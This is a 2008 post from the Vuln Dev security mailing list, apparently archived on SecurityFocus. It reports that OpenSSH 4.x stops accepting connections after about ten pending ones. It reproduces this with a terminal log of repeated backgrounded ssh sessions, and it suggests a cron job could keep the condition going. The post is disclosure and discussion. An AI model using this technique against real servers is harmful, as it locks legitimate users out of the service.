Vuln Dev
OpenSSH 4.X DoS (maybe...) Feb 26 2008 10:13PM
sipherr gmail com (1 replies)
OpenSSH 4.X deny remote connections.

The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections.

To reproduce:

telnet 3.1.33.7 22

Trying 3.1.33.7...

Connected to 3.1.33.7.

Escape character is '^]'.

SSH-2.0-OpenSSH_4.7p1 Debian-2

Protocol mismatch.

Connection closed by foreign host.

darkstar# ssh 3.1.33.7

The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established.

RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts.

root (at) 3.1.33 (dot) 7 [email concealed]'s password:

darkstar# ssh 3.1.33.7

darkstar# ssh 3.1.33.7 &

[1] 12945

darkstar# ssh 3.1.33.7 &

[2] 12946

darkstar# ssh 3.1.33.7 &

[3] 12947

darkstar# ssh 3.1.33.7 &

[4] 12948

darkstar# ssh 3.1.33.7 &

[5] 12949

darkstar# ssh 3.1.33.7 &

[6] 12950

darkstar# ssh 3.1.33.7 &

[7] 12951

darkstar# ssh 3.1.33.7 &

[8] 12952

darkstar# ssh 3.1.33.7 &

[9] 12953

darkstar# ssh 3.1.33.7 &

[10] 12954

darkstar# ssh 3.1.33.7 &

[11] 12955

darkstar#

ssh_exchange_identification: Connection closed by remote host

An attacker could cronjob a script to force this condition to remain true.

This will deny anyone else from connecting to the service. Normal behaviour?

Shouts: burnout,spithash princess^pookie, #codemasters

[ reply ]
Re: OpenSSH 4.X DoS (maybe...) Feb 29 2008 05:01PM
Eygene Ryabinkin (rea-sec codelabs ru)


 

Privacy Statement
Copyright 2010, SecurityFocus